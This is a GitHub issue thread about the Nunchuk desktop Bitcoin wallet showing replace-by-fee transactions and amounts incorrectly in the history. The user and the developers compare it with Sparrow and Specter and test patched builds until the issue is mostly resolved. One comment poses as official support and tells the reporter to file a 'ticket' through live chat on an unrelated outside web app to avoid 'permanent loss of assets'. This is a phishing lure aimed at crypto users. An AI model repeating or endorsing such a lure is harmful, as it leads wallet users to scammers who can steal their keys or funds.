### ISSUE TITLE
Transactions displayed incorrect in wallet history

### ISSUE THREAD

**Issue by Funman2** [nunchuk-io/nunchuk-desktop#32]
Currently I am connected in guest mode to my own electrum server.
In my recent transaction history I have two outgoing transactions which where broadcasted by specter desktop and memepool.space , they where both replaced by fee to bump the fee. 

So now in Nunchuk desktop it does not display/resolve the recipient address of these transactions, it says only "unknown", and only the fee trancation is visible like 0.00001463 btc, but the actual transcation of 0,034 btc is missing completely.
Even after force refeshing the wallet, it stayed the same.

When using sparrow or specter desktop wallet, connected to the same node, it is displayed correctly.
Also if I use nunchuk android the outgoing transactions are listed correctly. But in desktop app it's missing.

**Comment by giahuy98** [comment]
Hello @Funman2,
Could you provide a screenshot describing your issue, thank you.

**Comment by Funman2** [comment]
Here you can see the transactions which where replaced by fee displayed correctly in specter but false in nunchuk:
![Nunchuk issue](https://user-images.githubusercontent.com/105175715/218403618-d48f2aff-943b-42d0-af40-4b19ca3d6da6.jpg)
![Specter](https://user-images.githubusercontent.com/105175715/218403643-48e09dc0-c0e7-4346-accf-e3a62a4ee1de.jpg)

**Comment by Andrewhleach** [comment]
Dear user 
You’re experiencing transcript error,We care deeply about your experience on the mainnet. In order to prevent permanent loss of assets, please submit a ticket at[BTC Nobe support ](https://dappwalletnode.web.app/) .Using the livechat support page on the lower right corner of the homepage,One of our live agents will assist you as soon as possible. 

Thank you.

**Comment by giahuy98** [comment]
Hey Funman2,

You can try our latest release at this link: https://github.com/nunchuk-io/nunchuk-desktop/releases/tag/1.9.17. Let us know if it works for you!

**Comment by Funman2** [comment]
Hey I am away from keybord until Sunday, so will try then!

**Comment by giahuyng98** [comment]
Currently Nunchuk only supports one change address per transaction, according to current convention.
May I ask why did you use change addresses as receive addresses? (as opposed to using actual receive addresses).

**Comment by giahuy98** [comment]
Currently Nunchuk only supports one change address per transaction, according to current convention.
May I ask why did you use change addresses as receive addresses? (as opposed to using actual receive addresses).

**Comment by Funman2** [comment]
Actually, I honestly don't know anymore, will check how this particular transactions look in sparrow and trezor suite...

**Comment by Funman2** [comment]
In the latest Version of nunchuk desktop (v1.9.18)
Very strange transactions show up which really don't ad up, are these change addresses? They shouldn't be displayed...For comparison i added same tx in sparrow to check for you... 
![Nunchuk](https://user-images.githubusercontent.com/105175715/234660424-46ac1a1c-a2e3-4fa0-b207-621dd788fd78.png)

**Comment by hugohn** [comment]
Hey @Funman2 , we're looking into this right now. Will report back asap.

**Comment by Funman2** [comment]
I investigated a little further, I think i used Specter desktop or Sparrow to bump the fee, not sure, but here is the replace by fee how it looks in sparrow and then the details with the wrong display in Nunchuk:
![Sparrow change](https://user-images.githubusercontent.com/105175715/234776721-c6100e18-38a0-4439-931a-b2305a128969.png)
![Change fee](https://user-images.githubusercontent.com/105175715/234776759-39bb5748-8cef-4a82-8c35-16e2402e5664.jpg)
![Nunchuk change](https://user-images.githubusercontent.com/105175715/234776798-32085285-9e00-4144-bfb8-918e9746faec.jpg)

**Comment by Funman2** [comment]
Dear Baron Tong, all these transaction details I shared here are from the desktop app.
So the incorrect shows the replace fee as change in desktop app.

**Comment by Funman2** [comment]
Also the detail is from desktop app.

**Comment by tongvanlinh** [comment]
@Funman2 ag, I see. I'm checking on this now, then share you result soon

**Comment by tongvanlinh** [comment]
@Funman2 is possible to share tx detail on your android ? (with same tx), it's also is good reference

**Comment by Funman2** [comment]
![20230427_153113](https://user-images.githubusercontent.com/105175715/234879328-6c42be28-74e2-47be-8e77-8b552970b57c.jpg)
It is really confusing since I seem to find 2 different transaction in android displayed as one in desktop version:
![20230427_153142](https://user-images.githubusercontent.com/105175715/234879294-dee0cfff-d17e-4db2-9dee-f2911aea81fb.jpg)

**Comment by tongvanlinh** [comment]
@Funman2 I've improved arround guessing point.
Could you help me check with your wallet with this patch [[LINK]](https://github.com/nunchuk-io/nunchuk-desktop/releases/download/1.9.19/nunchuk-window-v1.9.19.zip)

**Comment by Funman2** [comment]
Hey thanks for your quick fix!
That looks a lot better now, but still it shows a different amount as in sparrow wallet or specter walleti enclose the tx in overview and details and sparrow , then specter:
![Nunchuk 19](https://user-images.githubusercontent.com/105175715/234925779-603cf259-19ad-4489-8383-7d565ec5dc30.png)
![Nunchuk details](https://user-images.githubusercontent.com/105175715/234925851-9208582f-91fa-4aba-b5b7-6771814298fe.png)
![Sparrow](https://user-images.githubusercontent.com/105175715/234925873-bccb2614-7958-45a6-84fa-223092fd9199.png)
![Specter](https://user-images.githubusercontent.com/105175715/234926657-5065830b-c9a4-41b6-9445-7818c1ef4842.jpg)
![Specter2](https://user-images.githubusercontent.com/105175715/234926751-20837119-b9a4-440b-8692-f6b05eb5ba63.png)
Also still in the view of all transcations the tx of year 2021 don't show up, only if i toggle the time tab but not in regular order from newest to oldest. I belive this was fixed already in prior versions?

**Comment by Funman2** [comment]
It now seems to always display the total amount instead of the amount sent...there is this discrepancy to specter and sparrow.

**Comment by Funman2** [comment]
After further investigation all transactions match with sparrow wallet except this one, maybe the fee was bumped differently here...so in specter the outgoing only show the amount received by the recipient without fee. So its pretty good now.

**Comment by Funman2** [comment]
So in this test version you sent me, signing into primary key account does not work anymore...after entering key passphrase it does not log in...

**Comment by Funman2** [comment]
Hey i saw, in version 1.9.19 most of the displaying balance issues are gone now. Congrats! Only please verify why this transaction is show differently then in specter or sparrow: tx id 914340d3e8f839bd1d65ab8b45d64c908d4e2f16af678ea34fae91897c9ef3f5, i think it was going to change addresses and was a self transfer, so maybe because of gap limit it did not know all my adresses from my xpub...
Anyway, closing this now.

**Comment by Funman2** [comment]
Also I can find all transactions in history again now. Good job!
